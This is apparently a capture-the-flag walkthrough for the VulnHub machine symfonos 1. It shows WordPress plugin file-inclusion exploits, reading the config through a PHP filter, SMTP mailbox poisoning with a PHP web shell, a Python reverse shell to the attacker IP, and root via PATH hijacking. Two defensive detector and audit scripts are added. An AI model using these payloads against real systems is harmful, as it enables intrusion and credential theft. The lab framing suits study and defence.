【攻略鸭】symfonos 1 - VulnHub target machine walkthrough

The content of this article is purely fictional. Please follow and like 攻略鸭 on Bilibili!
Set the target VM's network adapter to NAT.
Target IP: 192.168.31.145
Attacking machine IP: 192.168.31.37
External information gathering
Visiting http://192.168.31.145/ shows nothing but an image.
Directory structure
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.145/FUZZ
http://192.168.31.145/manual/
http://192.168.31.145/image.jpg
http://192.168.31.145/index.html
Port scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian
137/udp open netbios-ns udp-response ttl 64 Samba nmbd netbios-ns
SMB null-session login
$ smbclient -L 192.168.31.145
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
smbclient "\\\\192.168.31.145\IPC$"
smb: \> ls
smbclient "\\\\192.168.31.145\anonymous"
smb: \> ls
attention.txt
smb: \> get attention.txt
smbclient "\\\\192.168.31.145\helios"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
smbclient "\\\\192.168.31.145\print$"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
Instead of smbclient you can also open smb://192.168.31.145/ directly in the Kali file manager.
Contents of attention.txt:
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
Try the leaked password against the SMB share
smbclient "\\\\192.168.31.145\helios" -U helios%qwerty
smb: \> ls
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
smb: \> get research.txt
smb: \> get todo.txt
Contents of research.txt:
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
Nothing useful here.
Contents of todo.txt:
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
This reveals the /h3l105 directory.
WordPress
Visiting http://192.168.31.145/h3l105/ shows a WordPress site.
sudo wpscan --url http://192.168.31.145/h3l105/ --enumerate vt,vp,u
WordPress version 5.2.2 identified (Insecure, released on 2019-06-18)
Username: admin
http://192.168.31.145/h3l105/wp-content/uploads/
Capturing the page's traffic with Burp Suite shows that requests to the server reference the hostname symfonos.local.
Edit /etc/hosts:
192.168.31.145 symfonos.local
$ sudo wpscan --url http://symfonos.local/h3l105/
Plugin(s)
[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
Search for and verify WordPress plugin vulnerabilities
$ searchsploit wordpress mail masta
------------------------------------------------------------ ----------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion      | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)  | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection             | php/webapps/41438.txt

$ searchsploit wordpress site editor
------------------------------------------------------------ ----------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ----------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion   | php/webapps/44340.txt
WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery | php/webapps/25721.txt

searchsploit -m 40290.txt
PoC: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
LFI confirmed.

searchsploit -m 50226.py
python2 50226.py
~# http://symfonos.local/h3l105
[*] Checking if the Mail-Masta endpoint is vulnerable...
[!] Endpoint vulnerable!

searchsploit -m 41438.txt
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php
sqlmap -u "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0*&pl=/var/www/html/wordpress/wp-load.php" --batch
Could not be verified.

searchsploit -m 44340.txt
PoC: http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
LFI confirmed. Result:
root:x:0:0:root:/root:/bin/bash
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
Exploiting the LFI
First attempt:
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
This fails. After reproducing it in a locally built environment, my guess is that the `_once` include is the reason, so switch to the other exploit:
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
This yields:
'DB_NAME', 'wordpress'
'DB_USER', 'wordpress'
'DB_PASSWORD', 'password123'
'DB_HOST', 'localhost'
Trying this password over SSH fails.
SMTP log poisoning: turning the LFI into RCE
Use the LFI to try reading the Apache log: http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log
Use the LFI to try reading the SMTP mailbox: http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
The SMTP mailbox (/var/mail/helios) turns out to be readable.
$ nc 192.168.31.145 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:asdf
250 2.1.0 Ok
RCPT TO:helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["cmd"]);?>
.
250 2.0.0 Ok: queued as 9ABDC4084A
QUIT
221 2.0.0 Bye

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
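The defender's view of the two steps above (the LFI probing and the mailbox-poisoning follow-up), as an added example that is not part of the original walkthrough: a small detector that runs over Apache access-log lines and flags path traversal, PHP stream wrappers, includes of sensitive files, and the tell-tale combination of a log or mailbox path with a command parameter, plus a check for PHP tags landing in a mail spool. The log lines and spool snippet are constructed for the demo; the indicator lists and reason strings are my own choices.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" access-log lines (not captured from the target):
# one benign request followed by the kinds of requests the walkthrough issues.
SAMPLE_ACCESS_LOG = """\
192.168.31.37 - - [28/Jun/2019:20:40:01 +0000] "GET /h3l105/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.31.37 - - [28/Jun/2019:20:41:12 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1894 "-" "curl/7.64.0"
192.168.31.37 - - [28/Jun/2019:20:42:30 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 4102 "-" "curl/7.64.0"
192.168.31.37 - - [28/Jun/2019:20:45:07 +0000] "GET /h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=id HTTP/1.1" 200 712 "-" "curl/7.64.0"
192.168.31.37 - - [28/Jun/2019:20:46:00 +0000] "GET /h3l105/wp-content/uploads/%252e%252e/%252e%252e/wp-config.php HTTP/1.1" 404 210 "-" "curl/7.64.0"
"""

# Constructed mbox fragment showing what the web server ends up include()-ing
# after the SMTP poisoning step.
SAMPLE_SPOOL = """\
From asdf@symfonos.localdomain  Fri Jun 28 20:50:00 2019
Return-Path: <asdf@symfonos.localdomain>
To: helios@symfonos.localdomain

<?php system($_GET["cmd"]);?>
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Indicator lists (assumed; extend for your environment).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/var/mail/", "/var/log/",
                   "/proc/self/", "wp-config.php")
STREAM_WRAPPERS = ("php://", "data:", "expect://", "phar://")
EXEC_PARAMS = {"cmd", "c", "exec", "command"}


def classify_request(target):
    """Return the reasons why a request target looks like an LFI attempt (empty if clean)."""
    reasons = []
    decoded = unquote(unquote(target))          # undo double encoding such as %252e
    params = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]
    if "../" in decoded or "..\\" in decoded:
        reasons.append("path traversal")
    if any(v.lower().startswith(STREAM_WRAPPERS) for v in values):
        reasons.append("php stream wrapper")
    if any(p in v for v in values for p in SENSITIVE_PATHS):
        reasons.append("sensitive file path in parameter")
    includes_log = any("/var/mail/" in v or "/var/log/" in v for v in values)
    if includes_log and EXEC_PARAMS & set(params):
        reasons.append("log/mailbox include with command parameter (poisoning execution)")
    return reasons


def scan_access_log(text):
    """Yield (line_no, request_target, reasons) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((lineno, m.group("target"), reasons))
    return hits


def mailbox_has_php(spool_text):
    """True if a mail spool contains PHP open tags: mail bodies should never
    carry executable markup, so this is a strong poisoning signal."""
    return bool(PHP_TAG_RE.search(spool_text))


if __name__ == "__main__":
    for lineno, target, reasons in scan_access_log(SAMPLE_ACCESS_LOG):
        print("line %d: %s\n    %s" % (lineno, target, "; ".join(reasons)))
    print("PHP in mail spool:", mailbox_has_php(SAMPLE_SPOOL))
```

The mailbox check is the cheaper of the two to run continuously (a cron job over /var/mail and the Postfix queue), while the access-log rules are the kind you would load into a SIEM; the mitigation that removes the whole chain is still to keep the web server from include()-ing anything outside the application tree.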
Getting a shell
nc -nvlp 443
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.37",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
Local information gathering
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
statuscheck
cat /opt/statuscheck
(binary; nothing readable)
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
Privilege escalation by hijacking the PATH environment variable
cd /tmp
echo "int main(void) {" > curl.c
echo -e "\tsetgid(0); setuid(0);" >> curl.c
echo -e "\texecl(\"/bin/sh\",\"sh\",0);" >> curl.c
echo "}" >> curl.c
cat curl.c
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0);
}
helios@symfonos:/tmp$ gcc curl.c -o curl
curl.c: In function 'main':
curl.c:2:2: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
setgid(0); setuid(0);
^~~~~~
curl.c:2:13: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
setgid(0); setuid(0);
^~~~~~
curl.c:3:2: warning: implicit declaration of function 'execl' [-Wimplicit-function-declaration]
execl("/bin/sh","sh",0);
^~~~~
curl.c:3:2: warning: incompatible implicit declaration of built-in function 'execl'
env
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
env
PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)
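What makes /opt/statuscheck hijackable is the pair of choices visible in the strings output: a bare command name (`curl`) launched through `system()`, which honours whatever PATH the caller supplies. The following audit helper, added here as an example and not part of the original walkthrough or the target, emulates the PATH lookup, flags PATH entries an unprivileged user can write to, and contrasts the weak invocation with the hardened form (absolute path, fixed PATH). The temporary directory, the planted file and the policy strings are constructed for the demo.

```python
import os
import shutil
import stat
import tempfile

# PATH a privileged helper should hand to its children instead of inheriting the caller's.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_via_path(command, path):
    """Emulate the lookup system()/execvp perform for a bare command name:
    the first PATH directory holding an executable of that name wins.
    An absolute command name is returned unchanged because no lookup happens."""
    if os.path.isabs(command):
        return command
    for directory in path.split(":"):
        candidate = os.path.join(directory or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def untrusted_path_dirs(path):
    """PATH entries an unprivileged user can drop files into: world-writable
    (like /tmp) or not owned by root. Anything placed there shadows a system binary."""
    risky = []
    for directory in path.split(":"):
        try:
            st = os.stat(directory or ".")
        except FileNotFoundError:
            continue
        if st.st_mode & stat.S_IWOTH or st.st_uid != 0:
            risky.append(directory)
    return risky


def check_invocation(argv, env):
    """Policy check for how a privileged (SUID) program launches a child:
    report a bare command name and every untrusted directory in the PATH
    that lookup would consult."""
    problems = []
    if not os.path.isabs(argv[0]):
        problems.append("command '%s' is a bare name; resolved through PATH" % argv[0])
    for directory in untrusted_path_dirs(env.get("PATH", "")):
        problems.append("PATH entry '%s' is writable by unprivileged users" % directory)
    return problems


def demo():
    """Constructed scenario: a world-writable directory prepended to PATH holds an
    executable called 'curl', exactly the situation 'export PATH=/tmp:$PATH' creates."""
    planted_dir = tempfile.mkdtemp(prefix="pathaudit-")
    try:
        os.chmod(planted_dir, 0o1777)                      # same mode bits as /tmp
        fake = os.path.join(planted_dir, "curl")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho not-the-real-curl\n")
        os.chmod(fake, 0o755)
        tainted_env = {"PATH": planted_dir + ":" + SAFE_PATH}

        weak = ["curl", "-I", "http://localhost"]          # what strings showed in /opt/statuscheck
        fixed = ["/usr/bin/curl", "-I", "http://localhost"]  # hardened: absolute path, fixed PATH
        result = {
            "planted_dir": planted_dir,
            "weak_resolves_to": resolve_via_path(weak[0], tainted_env["PATH"]),
            "weak_problems": check_invocation(weak, tainted_env),
            "fixed_resolves_to": resolve_via_path(fixed[0], tainted_env["PATH"]),
            "fixed_problems": check_invocation(fixed, {"PATH": SAFE_PATH}),
        }
    finally:
        shutil.rmtree(planted_dir)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Even with the absolute path, a SUID helper should reset its environment (PATH, LD_* and friends) before spawning anything, or better, drop privileges with setresuid/setresgid before the call; `check_invocation` is the kind of test a build pipeline can run against every privileged helper's documented child commands.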
Flag
cat /root/proof.txt
Congrats on rooting symfonos:1!